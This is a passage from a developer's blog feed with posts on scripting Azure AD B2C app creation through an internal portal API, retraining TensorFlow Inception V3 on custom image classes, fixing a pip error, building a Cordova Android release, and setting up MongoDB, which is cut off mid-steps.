<script src="https://gist.github.com/ramkrivas/157d72a1827d45e55307d5b374b9b225.js"></script>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-20786093528140086942018-01-30T19:39:00.001+05:302020-12-13T09:51:51.361+05:30How to Create Azure AD B2C app programmatically using Powershell or Graph API<div dir="ltr">
We've had critical business need to create or register native /web client applications on Azure AD B2C blade programmatically. Currently Graph API or Powershell cmdlets supports creating applications only in AD blade, NOT under B2C blade (V2 app), we've even tried with MSGraph API, though MSGraph post API was able to create application in the B2C, the application was getting created as "faulted app"(useless). We approached Microsoft support team many times and all the times the response from them was "NO, currently we are NOT supporting B2C app creation programmatically". We even approached PM's in Microsoft and got the same answer, saying this functionalities will be available only be next year (2019) - insane ..right </div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
As this was a critical need for us, I was forced to find atleast a temporary workaround for this and here's what I tried and worked for me.</div>
<div dir="ltr">
<br />
As we know the only way to crate B2C app is creating to manually from portal.azure.com...so as a first step I tried to mock that activities using Powershell.</div>
<div dir="ltr">
<br />
So, using fiddler first I try to capture the access token and Azure internal API which being used while doing it manually from portal.</div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
With JWT token captured through fiddler, I decoded token and get the "Audi" audience information which is the resource server which accepts the token. Then using RM context refresh token grant type, I invoked a rest method which will give API token for the particular "aud" or resource which we get in previous steps.</div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
Now, with this internal API token, I invoked "https://main.b2cadmin.ext.azure.com/API/ApplicationV2/PostNewApplication" to create B2C app... Below is the same code.</div>
<div dir="ltr">
Note : This is just a temporary workaround for this , not recommended for production.<br />
<br /><br />
<br /></div>
<script src="https://gist.github.com/ramkrivas/c2880d3d4b219accbbeb4249c937f7e5.js"></script>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com1tag:blogger.com,1999:blog-6523941902002289478.post-13366225248779778772017-11-05T13:49:00.001+05:302018-01-31T08:44:36.607+05:30Tensorflow : Retraining Inception V3 model to classify custom objectsThis tutorial we will see on how to retrain Inception model to classify custom objects. And also we will try to see how to save model checkpoint files and making use of Tensorboard effectively.<br />
<br />
As like most of you, initially I was also confused with what <b>Inception </b>models really does. does it have object detection ability ? or does it just have image classification. ?<br />
<br />
The answer was Inception model is just for classification, NOT for object detection. For object detection, google provides "object detection API" library which can detect all trained objects in a single image. On the other hand, <b>Inception </b>library just can be used to classify an image/ object. Hope you understand what object detection and classification means.<br />
<br />
This tutorial, we are going to explore only on <b>Inception</b> model retraining.<br />
<br />
With the launch of Inception V3 model, we should thank Google for saving lot of computation time for us and providing ability to retrain the existing model . To build a model from scratch requires more GPU computation and does requires more amount of time. with the help of pre-trained models, we can retrain the final layer with our custom image class which will take very lesser time than building model from scratch.<br />
<b><br /></b>
<br />
<h4>
<b><u>Firstly, how does re-training works in existing model ?</u></b></h4>
<br />
To understand how it works, you need to know the concepts of Tensorflow Bottlenecks. The last but one layer of the neural network is trained to give out different values based on the image that it gets. This layer has enough summarized information to provide the next layer which does the actual classification task. This last but one layer is called the bottleneck.<br />
<br />
Tensorflow computes all the bottleneck values as the first step in training. The bottleneck values are then stored as they will be required for each iteration of training. The computation of these values is faster because tensorflow takes the help of existing pre-trained model to assist it with the process.<br />
<br />
<h4>
<u><b>How to Re-train Inception V3 model </b></u></h4>
<div>
<u><b><br /></b></u></div>
As we start re-training model, we should have below things done.<br />
<br />
1. Plan for new classes or categories need to be re-trained.<br />
<br />
In this example : we are going to train 3 new categories. let's take Obama, Trump and George Bush images to train (minimum of 50 images per categories).<br />
<br />
Create 3 folders with respective images for training inside a folder named "USPresidents"<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUvLpQWHVKxuBMc8k1CUG1Il61JR_LqzZBRF6YpihwY2rPH1KY6i8avtFAia7bXK9w5IgGcCZwF5DTJQ4-mfVtwR_Lb09VId6tiERtd334l2XR81uFsvh367Y-8h2M27XnXPk3SC1e8fU/s1600/retrained_folders.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="114" data-original-width="615" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUvLpQWHVKxuBMc8k1CUG1Il61JR_LqzZBRF6YpihwY2rPH1KY6i8avtFAia7bXK9w5IgGcCZwF5DTJQ4-mfVtwR_Lb09VId6tiERtd334l2XR81uFsvh367Y-8h2M27XnXPk3SC1e8fU/s400/retrained_folders.jpg" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
2. Create a label file (.txt file) which contains list new categories going to be retrained.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6RhEiPq6d_eWDm7fLL3yH8-ILs0b1kea6Hz6v6YxsdSjQUEzz2EzTWNwgrJr9ijMsVWH0gqbonUknazpr8pITG9w6QPUvJwhOQj1fgih2zRGnqXgi15NHfOBnsQJg8q0i4nrRhIW5YUo/s1600/retrain_label.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="119" data-original-width="321" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6RhEiPq6d_eWDm7fLL3yH8-ILs0b1kea6Hz6v6YxsdSjQUEzz2EzTWNwgrJr9ijMsVWH0gqbonUknazpr8pITG9w6QPUvJwhOQj1fgih2zRGnqXgi15NHfOBnsQJg8q0i4nrRhIW5YUo/s200/retrain_label.jpg" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
3. Download Inception V3 model from the below URL and<br />
<br />
<a href="http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz">http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz</a><br />
<br />
4. Download retrain.py python file from the below link<br />
<br />
<a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/image_retraining/retrain.py">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/image_retraining/retrain.py</a><br />
<br />
Run the downloaded retrain.py file from the command prompt<br />
<br />
<code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">python retrain.py </code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">model_dir .</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">/</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">inceptionModelFolderPath </code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">image_dir ~</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">/</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">USPresidentsFolderPath </code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">output_graph .</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">/</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">outputFolderPath </code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python keyword" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">-</code><code class="python plain" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">how_many_training_steps </code><code class="python value" style="background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 153, 0) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Monaco, Consolas, "Bitstream Vera Sans Mono", "Courier New", Courier, monospace !important; font-size: 15.2px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;">500</code><br />
<br />
–model_dir – This parameter gives the location of the pre-trained model. (The model file location which we downloaded in STEP 3)<br />
–image_dir – Path of the image folder which was created in step 1<br />
–output_graph – The location to store the newly trained graph.<br />
–how_many_training_steps – Training steps indicate the number iterations to perform. By default, this is 4000. Finding the right number is a trial and error process and once you find the best model, you can start using that.<br />
<br />
The output the above script running will generate a graph definition file name output_graph.pb.which will be used later to test the retrained model.<br />
<br />
Also, if you dig into the retrain.py, you can notice the Tensor name of the last trained layer. You can search by "final_tensor_name"<br />
<br />
<h4>
<b>Testing the Re-Trained Model</b></h4>
To test retrained model, take a sample image which you want test and run the below python script.<br /><br/>
<script src="https://gist.github.com/ramkrivas/d1ce981c03cbaa509476e08849ec1ca2.js"></script>
<br />
<table class="highlight tab-size js-file-line-container" data-tab-size="8" style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: border-box; color: #24292e; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 14px; tab-size: 8;"><tbody style="box-sizing: border-box;">
<tr style="box-sizing: border-box;"><td class="blob-num js-line-number" data-line-number="2" id="L2" style="box-sizing: border-box; color: rgba(27, 31, 35, 0.3); cursor: pointer; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12px; line-height: 20px; min-width: 50px; padding: 0px 10px; text-align: right; user-select: none; vertical-align: top; white-space: nowrap; width: 50px;"></td><td class="blob-code blob-code-inner js-file-line" id="LC2" style="box-sizing: border-box; line-height: 20px; overflow: visible; padding: 0px 10px; position: relative; vertical-align: top; word-wrap: normal;"><br /></td></tr>
</tbody></table>
<br />
Save this script as "Test_Retrained_Classifier.py" and run from the command prompt<br />
<br />
<br />
C:\> python Test_Retrained_Classifier.py<br />
<br />
<br />
<br />
<br />
You are done.. !!<br />
<br />
As a result, you will get results predicted for the given test image. Now you have a custom image classifier running which can classify who is there in the given image. Is it Obama or Trump. Your retrained model can identify for you.<br />
<br />
If you want to debug the list of tensor names or operations. you can add the below line after tf.session() crated.<br />
<br />
for i in sess.graph.get_operations():<br />
print(i.name)<br />
<br />
This will print all the operations inside the retrained model. As you can noticed before retrain the output tensors is Softmax, now if you can run this piece of code it can show you the retrained layer output sensor which is "final_result".<br />
<br />
Also, you can use tensorboard, digging further on each convolution layer and debugging.<br />
<br />
Enjoy !!<br />
<br />
<br />Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-40087542516377117882017-06-18T11:29:00.000+05:302017-09-06T12:37:22.557+05:30AttributeError: '_NamespacePath' object has no attribute 'sort' - Python PIPI was facing an error while using PIP install command. It was working well and suddenly throwing error "AttributeError: '_NamespacePath' object has no attribute 'sort' ".<br />
<br />
None of PIP command did not work at all and sensed to me PIP package broken.<br />
<br />
Finally, Reinstalling pip packages helped me to resolve the error. steps to reinstall<br />
<br />
<pre style="background-color: #f6f8fa; border-radius: 3px; box-sizing: border-box; color: #24292e; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 11.9px; font-stretch: normal; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 11.9px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">git clone https://github.com/pypa/pip.git
cd pip
python setup.py install</code></pre>
<pre style="background-color: #f6f8fa; border-radius: 3px; box-sizing: border-box; color: #24292e; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 11.9px; font-stretch: normal; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 11.9px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;"><b>Update :</b> Even after I reinstall PIP, the issues was occurring randomly. Finally came to know the permanent fix for the issue, problem was the Python version I had in my machine. I updated my python version from 3.6.1 to 3.6.2 and thereafter this issue did NOT occur.</code></pre>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-27008044900030538942016-05-23T08:01:00.000+05:302016-05-23T08:01:37.291+05:30How to take release build for Google Play Store using Cordova<br />
Step 1: Navigate to your Project Folder in command prompt<br />
<br />
Step 2: Type "cordova build --release android"<br />
<br />
Step 3 : Navigate to build output path: ...\platforms\android\build\outputs\apk<br />
<br />
Step 4: Sign apk using below command<br />
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore YOURAPP.keystore android-release-unsigned.apk YOURAPP<br />
<br />
Step 5: Compress/zip apk<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>Naivate to below path in command prompt:<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>C:\AndroidStudio\build-tools\23.0.2\<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>Run the below command<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>zipalign -v 4 android-release-unsigned.apk YOURAPP.apk<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
Now the APK is ready in below path to release in Play store<br />
../platforms\android\build\outputs\apk\YOURAPP.apkRamkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-3009141234159478942016-02-29T23:40:00.001+05:302016-02-29T23:40:17.425+05:30Cordova app - OnDevice ready event is NOT firing /stopped firingToday when I ran my app "ondevice ready" suddenly stopped firing which was working fine earlier.<br />
<br />
After few hours of wasting time, old build version helped me to found the root cause :-)<br />
<br />
Yes, I missed "cordova.js" lib reference in new version pages.<br />
<br />
Finally fixed the issue by adding "cordova.js" lib ref<br />
<br />
<script type="text/javascript" src="cordova.js"></script>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-29519982564003764802016-01-19T12:49:00.001+05:302020-02-14T10:23:34.474+05:30How to setup MongoDB environment <div class="MsoNormal">
Recently I had setup MongoDB in my machine, here sharing the learning of end to end steps involved to setup Mongo DB and confirm the installation.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Steps to install MongoDB<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Go to <a href="https://www.mongodb.org/downloads#production">https://www.mongodb.org/downloads#production</a>
and grab installation file, make sure you selected correct development
environment<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Start run the installation file and follow the
prompts <o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Installation path prompt click “Custom” and
change the installation path to “C:\MongoDB” ( just for easy reference purpose)<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Add the installation path (C:\MongoDB) to
environment variables <o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
Steps to add in environment variables:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
Windows 7:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
My
Computer > Properties > Change settings > Advanced > Environment variables<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
> Click Path > Edit > at
the end of existing entries type semicolon “;” and add installation path “C:\MongoDB”
next to that. > Click Ok > Ok.<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Once installation finished open the folder “C:\MongoDB”
and create 2 sub folders inside it<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
two subfolders: “conf”, “log”<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Open a text editor and add the following code :<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
# mongodb.conf<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
# point mongodb to the data
directory<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
dbpath=C: \data\db<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
